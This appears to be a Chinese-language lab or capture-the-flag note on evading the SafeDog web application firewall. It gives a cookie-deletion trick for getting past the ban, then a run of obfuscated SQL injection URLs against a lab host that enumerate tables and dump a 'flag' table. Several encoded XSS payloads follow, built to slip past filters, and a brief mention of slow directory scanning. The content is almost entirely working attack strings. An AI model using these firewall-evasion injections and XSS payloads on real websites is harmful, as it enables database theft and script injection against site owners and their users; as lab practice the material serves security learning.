小技巧
如果你发送payload被ban后,安全狗会在你的cookie中插入一段cookie,之后你访问这个页面就会被拦截了,只要你删除那段cookie即可绕过拦截。
sql注入
http://10.1.1.18/control/sqlinject/manifest_error.php?id=1'/**/and/**/-1=-1--+
http://10.1.1.18/control/sqlinject/manifest_error.php?id=1'/**/and/**/-1=-2--+
http://10.1.1.18/control/sqlinject/manifest_error.php?id=1'/**/order--+/*%0Aby 2--+
http://10.1.1.18/control/sqlinject/manifest_error.php?id=-1%27/**/union/**//*!10044select*//**/1,2--+
http://10.1.1.18/control/sqlinject/manifest_error.php?id=-1%27/**/union/**//*!10044select*//**/1,/*!10044database*//*!()*//**/--%20--+
http://10.1.1.18/control/sqlinject/manifest_error.php?id=-1%27/**/union/**//*!10044select*//**/1,group_concat(table_name)/**/%20--+/*%0Afrom%20information_schema.tables%20where%20table_schema=database()%23*/
http://10.1.1.18/control/sqlinject/manifest_error.php?id=-1%27/**/union/**//*!10044select*//**/1,group_concat(column_name)/**/%20--+/*%0Afrom%20information_schema.columns%20where%20table_name=%27flag%27%23*/
http://10.1.1.18/control/sqlinject/manifest_error.php?id=-1%27/**/union/**//*!10044select*//**/1,group_concat(flag)/**/%20--+/*%0Afrom%20flag%23*/
xss
payload:
<iframe srcdoc%3d"%26lt%3bimg src%26equals%3bx%3ax onerror%26equals%3balert%26lpar%3b1%26rpar%3b%26gt%3b">
<object data%3ddata%3atext%2fhtml%3bbase64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==><%2fobject>
<marquee onstart%3dalert(1)><%2fmarquee>
<body/οnlοad=alert(1)><body>
<a onclick%3dalert(18)>
目录扫描
正常扫描扫描失败
利用7kbscan工具延时扫描: